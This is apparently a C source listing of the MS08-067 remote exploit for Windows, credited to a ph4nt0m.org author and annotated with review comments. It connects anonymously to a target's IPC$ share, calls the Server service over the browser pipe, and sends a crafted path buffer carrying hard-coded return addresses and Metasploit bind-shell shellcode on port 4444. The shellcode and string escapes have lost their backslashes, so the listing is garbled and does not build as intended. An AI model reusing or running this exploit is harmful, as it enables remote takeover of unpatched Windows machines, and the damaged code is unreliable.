MS08-067.c
- #include <winsock2.h>
- #include <windows.h>
- #include <stdio.h>
- #include <io.h>
- #include <fcntl.h>
- #include <memory.h>
- #include <wchar.h>
- #include "srvsvc.h"
- #include "srvsvc_c.c"
- #include "mem.h"
- #pragma comment(lib,"ws2_32")
- #pragma comment(lib,"mpr")
- #pragma comment(lib,"rpcrt4.lib")
- #pragma comment(lib,"MSVCRT.LIB")
/*
 * Absolute 32-bit addresses that MakeBuff stamps into the request:
 * dwRetAddr is written six times in a row, dwJmpAddr once right after.
 * They are fixed values for one specific target build (the banner in
 * main says the tool is built "for CN", presumably a Chinese-locale
 * Windows image); which module or instruction they point at cannot be
 * told from this file.
 */
DWORD dwRetAddr = 0x7ffa0eb8;
DWORD dwJmpAddr = 0x7ffa0eb7;
/*
 * Payload appended to the request by MakeBuff. The Metasploit header
 * below describes a 344-byte win32_bind shell (listens on TCP 4444,
 * EXITFUNC=thread, encoded with PexFnstenvSub); the first three bytes
 * ("sub esp, 0x70") are a hand-added prologue, so 347 bytes are intended.
 *
 * NOTE(review): as rendered on this page every "\x" escape has lost its
 * backslash ("x83xECx70"), so this array is 1041 plain ASCII characters
 * plus a NUL rather than the 347 bytes described above, and
 * sizeof(sc) - 1 in MakeBuff is 1041 here. The text is kept exactly as
 * shown; this listing does not compile to the author's payload.
 */
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char sc[] =
"x83xECx70" // sub esp, 0x70
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xad"
"x07xe6x4ax83xebxfcxe2xf4x51x6dx0dx07x45xfex19xb5"
"x52x67x6dx26x89x23x6dx0fx91x8cx9ax4fxd5x06x09xc1"
"xe2x1fx6dx15x8dx06x0dx03x26x33x6dx4bx43x36x26xd3"
"x01x83x26x3exaaxc6x2cx47xacxc5x0dxbex96x53xc2x62"
"xd8xe2x6dx15x89x06x0dx2cx26x0bxadxc1xf2x1bxe7xa1"
"xaex2bx6dxc3xc1x23xfax2bx6ex36x3dx2ex26x44xd6xc1"
"xedx0bx6dx3axb1xaax6dx0axa5x59x8exc4xe3x09x0ax1a"
"x52xd1x80x19xcbx6fxd5x78xc5x70x95x78xf2x53x19x9a"
"xc5xccx0bxb6x96x57x19x9cxf2x8ex03x2cx2cxeaxeex48"
"xf8x6dxe4xb5x7dx6fx3fx43x58xaaxb1xb5x7bx54xb5x19"
"xfex54xa5x19xeex54x19x9axcbx6fxf7x16xcbx54x6fxab"
"x38x6fx42x50xddxc0xb1xb5x7bx6dxf6x1bxf8xf8x36x22"
"x09xaaxc8xa3xfaxf8x30x19xf8xf8x36x22x48x4ex60x03"
"xfaxf8x30x1axf9x53xb3xb5x7dx94x8exadxd4xc1x9fx1d"
"x52xd1xb3xb5x7dx61x8cx2excbx6fx85x27x24xe2x8cx1a"
"xf4x2ex2axc3x4ax6dxa2xc3x4fx36x26xb9x07xf9xa4x67"
"x53x45xcaxd9x20x7dxdexe1x06xacx8ex38x53xb4xf0xb5"
"xd8x43x19x9cxf6x50xb4x1bxfcx56x8cx4bxfcx56xb3x1b"
"x52xd7x8exe7x74x02x28x19x52xd1x8cxb5x52x30x19x9a"
"x26x50x1axc9x69x63x19x9cxffxf8x36x22x42xc9x06x2a"
"xfexf8x30xb5x7dx07xe6x4a";
/* Forward declarations for the helpers defined after main. */
int MakeBuff(char *Buff,int BufLen);
void Usage(char *ProgName);
int WaitExit();
/*
 * Language selectors. NOTE(review): neither macro is referenced anywhere
 * in this file (main sets nLanguage = 0 and never reads it), so the
 * CN/TW distinction the banner hints at is not implemented here.
 */
#define CN 0
#define TW 1
/*
 * Entry point. argv[1] is the target host. Steps, in order:
 *   1. build "\\<host>\IPC$" and map it with WNetAddConnection2 using
 *      empty user-name and password strings (not NULL — presumably an
 *      anonymous/null-session mapping; confirm);
 *   2. compose an ncacn_np string binding to the target's browser pipe
 *      and bind the stub handle srvsvc__MIDL_AutoBindHandle (presumably
 *      declared in the included srvsvc_c.c) to it;
 *   3. call stub func23 with fixed arguments, fill Buff via MakeBuff,
 *      start the WaitExit timer thread, then call stub func1f with Buff;
 *   4. if func1f returns, or raises RPC exception 1726, print
 *      "Maybe Patched!" and release the binding.
 * Returns nothing; every failure path returns early.
 *
 * NOTE(review): func1f/func23 are opnum-named stubs generated from
 * srvsvc.h (not on this page). 0x1f is the srvsvc opnum of
 * NetprPathCanonicalize — the MS08-067 call — and 0x23 that of
 * NetprNameCompare, so that is presumably what they are; confirm.
 *
 * NOTE(review): the string literals in this listing have lost the
 * backslash of every escape ("n" for "\n", "\pipe\browser" for
 * "\\pipe\\browser", "x53x00" for "\x53\x00"). They are reproduced
 * exactly as shown and are not what the author compiled.
 */
void main(int argc, char *argv[])
{
    NETRESOURCE lpNetResource;
    char Username[256] = {0};       /* empty user name ...            */
    char Password[256] = {0};       /* ... and password (see step 1)  */
    DWORD Ret = 0;
    RPC_STATUS status;
    unsigned char * pszUuid = NULL;
    unsigned char * pszProtocolSequence = "ncacn_np";   /* RPC over SMB named pipe */
    unsigned char * pszNetworkAddress = "";
    unsigned char pszEndpoint[100] = "\pipe\browser";   /* escapes lost, see NOTE */
    unsigned char * pszOptions = NULL;
    unsigned char * pszStringBinding = NULL;
    char Server[256] = {0};
    char RemoteName[256] = {0};
    char Buff[0x700];               /* request buffer filled by MakeBuff */
    char Buff2[1000] = {0};         /* output buffer for func1f; 1000 is passed as its size */
    char *pBuff2 = (char *)&Buff2;  /* unused */
    char Buff3[100] = {0};          /* used only as a DWORD out-parameter below */
    int BufLen = 0;                 /* assigned from MakeBuff, never read */
    int ForceAttack = 0;            /* unused */
    int AntiDEP = 0;                /* unused */
    int nLanguage = 0;              /* unused; CN/TW are never consulted */
    DWORD dwID = 0;
    if(argc != 2)
    {
        Usage(argv[0]);
        return;
    }
    /*
     * NOTE(review): unbounded copies into 256-byte stack buffers. An
     * argv[1] of 256 bytes or more overflows Server, and RemoteName adds
     * a prefix and suffix on top of it; the empty-string check below only
     * runs after the copy. Bounded copies (snprintf with sizeof) would
     * close this.
     */
    strcpy(Server,argv[1]);
    sprintf(RemoteName,"\\%s\IPC$",Server);
    pszNetworkAddress = Server;
    if(strlen(Server) == 0)
    {
        Usage(argv[0]);
        return;
    }
    printf("nMS08-067 Exploit for CN by EMM@ph4nt0m.orgnn");
    /* Describe \\<host>\IPC$ as a connectable disk share with no local drive letter. */
    lpNetResource.dwScope=RESOURCE_CONNECTED;
    lpNetResource.dwType =RESOURCETYPE_DISK;
    lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
    lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
    lpNetResource.lpLocalName=NULL;
    lpNetResource.lpRemoteName = RemoteName;
    lpNetResource.lpComment=NULL;
    lpNetResource.lpProvider=NULL;
    /*
     * NOTE(review): CONNECT_UPDATE_PROFILE asks for the mapping to be
     * recorded in the caller's profile, and nothing in this file calls
     * WNetCancelConnection2, so the connection to the target outlives
     * this run on every path below, including the error returns.
     */
    Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
    if(Ret != NO_ERROR)
    {
        /* Ret already holds the error code; GetLastError() is not
         * guaranteed to reflect it — printing Ret would be exact. */
        printf("Make SMB Connection error:%dn",GetLastError());
        return;
    }

    printf("SMB Connect OK!n");
    status = RpcStringBindingCompose(pszUuid,
                                     pszProtocolSequence,
                                     pszNetworkAddress,
                                     pszEndpoint,
                                     pszOptions,
                                     &pszStringBinding);
    if(status != RPC_S_OK)
    {
        return;     /* silent failure */
    }
    status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
    if(status != RPC_S_OK)
    {
        return;     /* silent failure; pszStringBinding is not freed on this path */
    }
    RpcTryExcept
    {
        /*
         * First stub call with literal arguments. NOTE(review): the second
         * and third arguments are byte strings cast to wchar_t *; as
         * rendered here (escapes lost) they are plain ASCII without the
         * embedded NULs the original "\x53\x00..." form would carry.
         */
        func23(L"ph4nt0m",(wchar_t *)"x53x00x56x89x56x89x56x89x56x89",(wchar_t *)"x4Dx00x56x89x56x89",4,0);
        memset(Buff,0,sizeof(Buff));
        BufLen = MakeBuff(Buff,sizeof(Buff));
        /*
         * Timer thread: terminates the process 5 s from now whatever the
         * next call does. NOTE(review): WaitExit is declared int WaitExit()
         * and cast to LPTHREAD_START_ROUTINE, which expects
         * DWORD WINAPI fn(LPVOID); the mismatch is masked only because
         * WaitExit never returns.
         */
        CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
        /* Buff3 doubles as a DWORD out-parameter initialised to 1.
         * NOTE(review): a cast expression is not an lvalue in ISO C; this
         * relies on the compiler accepting the construct. */
        (DWORD)*(DWORD *)Buff3 = 1;
        /* Second stub call: Buff as a wide string, Buff2 (size 1000) as the
         * output buffer, an empty wide prefix, the DWORD in Buff3, flag 1. */
        func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);
    }
    RpcExcept ( 1 )
    {
        status = RpcExceptionCode();
        if(status == 1726)
        {
            /* 1726 (RPC_S_CALL_FAILED in winerror.h) is tolerated and
             * falls through to the "Maybe Patched!" message. */
        }
        else
        {
            printf("RpcExceptionCode() = %urn", status );
            return;     /* binding and string binding are not released here */
        }
    }
    RpcEndExcept
    /* Reached when func1f returned normally or raised 1726. */
    printf("Maybe Patched!n");
    RpcStringFree( &pszStringBinding );
    RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
    return;
}
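#define JMPPOINT "B041"

/*
 * Append n bytes from src to Buff at offset *len without exceeding BufLen.
 * Returns 0 on success and advances *len; returns -1 (nothing written)
 * when the append would not fit.
 */
static int AppendBytes(char *Buff, int BufLen, int *len, const void *src, int n)
{
    if (n < 0 || *len > BufLen - n)
        return -1;
    memcpy(Buff + *len, src, (size_t)n);
    *len += n;
    return 0;
}

/*
 * Fill Buff with the request that main hands to func1f as a wide string.
 *
 * Layout, in the order it is written:
 *   1. a marker pattern "B000", "B001", ... one 4-byte cell per step,
 *      stopped (without writing the cell) at JMPPOINT, i.e. 41 cells /
 *      164 bytes when BufLen allows; this step is bounded by BufLen;
 *   2. the first 26 bytes of that pattern are overwritten with the
 *      wide-character path L".\\a\..\..\NN" (13 UTF-16 units; assumes
 *      sizeof(wchar_t) == 2 as on MSVC);
 *   3. dwRetAddr six times, then dwJmpAddr once (7 x 4 bytes);
 *   4. four 0x48 bytes;
 *   5. the sc[] payload without its terminating NUL (sizeof(sc) - 1);
 *   6. the 4-byte tag "EMM!";
 *   7. a 2-byte NUL at the fixed offset 0x206 * 2 (0x40c), placed
 *      independently of len. With the intended 347-byte payload len is
 *      547, so 0x40c lies past the data; in this listing (escapes lost,
 *      1041-character sc[]) it lands inside the payload text.
 *
 * Buff   - destination buffer.
 * BufLen - size of Buff in bytes.
 * Returns the number of bytes written by steps 1-6, or -1 if Buff is too
 * small for the path overwrite, any of the fixed-size appends, or the
 * terminator at 0x40c. The original only bounded step 1 and wrote the rest
 * unchecked; main passes a 0x700-byte buffer, for which everything fits
 * and the output is unchanged.
 *
 * NOTE(review): the path literal and sc[] are reproduced as they appear on
 * this page; their backslash escapes look stripped, so the bytes differ
 * from the author's build.
 */
int MakeBuff(char *Buff, int BufLen)
{
    enum { PATH_BYTES = 13 * 2, TERM_OFF = 0x206 * 2, TERM_BYTES = 2 };
    static const char pad[4] = { 0x48, 0x48, 0x48, 0x48 };
    int len = 0;
    int i;
    char tmp[5] = {0};

    /*
     * Step 1. The loop stops at i == 41 (JMPPOINT) at the latest, so i never
     * reaches 1000 and "B%03d" plus its NUL always fits the 5-byte tmp.
     */
    for (i = 0; i < BufLen / 4; i++) {
        memset(tmp, 0, sizeof(tmp));
        sprintf(tmp, "B%03d", i);
        if (memcmp(tmp, JMPPOINT, 4) == 0)
            break;
        memcpy(Buff + len, tmp, 4);
        len += 4;
    }

    /* Step 2: overwrite the start of the pattern with the wide-char path. */
    if (BufLen < PATH_BYTES)
        return -1;
    memcpy(Buff, L".\\a\..\..\NN", PATH_BYTES);

    /* Step 3: six copies of dwRetAddr, then dwJmpAddr. */
    for (i = 0; i < 6; i++) {
        if (AppendBytes(Buff, BufLen, &len, &dwRetAddr, 4) != 0)
            return -1;
    }
    if (AppendBytes(Buff, BufLen, &len, &dwJmpAddr, 4) != 0)
        return -1;

    /* Step 4: four 0x48 bytes. */
    if (AppendBytes(Buff, BufLen, &len, pad, 4) != 0)
        return -1;

    /* Step 5: the payload without its terminating NUL. */
    if (AppendBytes(Buff, BufLen, &len, sc, (int)(sizeof(sc) - 1)) != 0)
        return -1;

    /* Step 6: trailing tag. */
    if (AppendBytes(Buff, BufLen, &len, "EMM!", 4) != 0)
        return -1;

    /* Step 7: wide NUL at a fixed offset, independent of len. */
    if (BufLen < TERM_OFF + TERM_BYTES)
        return -1;
    memset(Buff + TERM_OFF, 0, TERM_BYTES);
    return len;
}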
/*
 * Print the command-line synopsis to stdout.
 * ProgName - argv[0], echoed into the usage line.
 * NOTE(review): the "n" sequences in the literal look like "\n" escapes
 * whose backslash was lost when this listing was rendered; the string is
 * reproduced exactly as shown.
 */
void Usage(char *ProgName)
{
    fprintf(stdout,
            "n MS08-067 Exploit for CN by EMM@ph4nt0m.orgnn %s <Server>nn",
            ProgName);
}
/*
 * Thread body that main starts right before the payload-carrying RPC call:
 * sleeps five seconds, prints a marker, and terminates the whole process
 * with exit code 0 regardless of what that call did. The final return is
 * never reached.
 * NOTE(review): declared as int WaitExit() but passed to CreateThread via a
 * cast to LPTHREAD_START_ROUTINE, which expects DWORD WINAPI fn(LPVOID);
 * the mismatch is masked only because ExitProcess never returns.
 */
int WaitExit()
{
    const unsigned long delay_ms = 5 * 1000;

    Sleep(delay_ms);
    fputs("Send Payload Over!n", stdout);
    ExitProcess(0);
    return 0;
}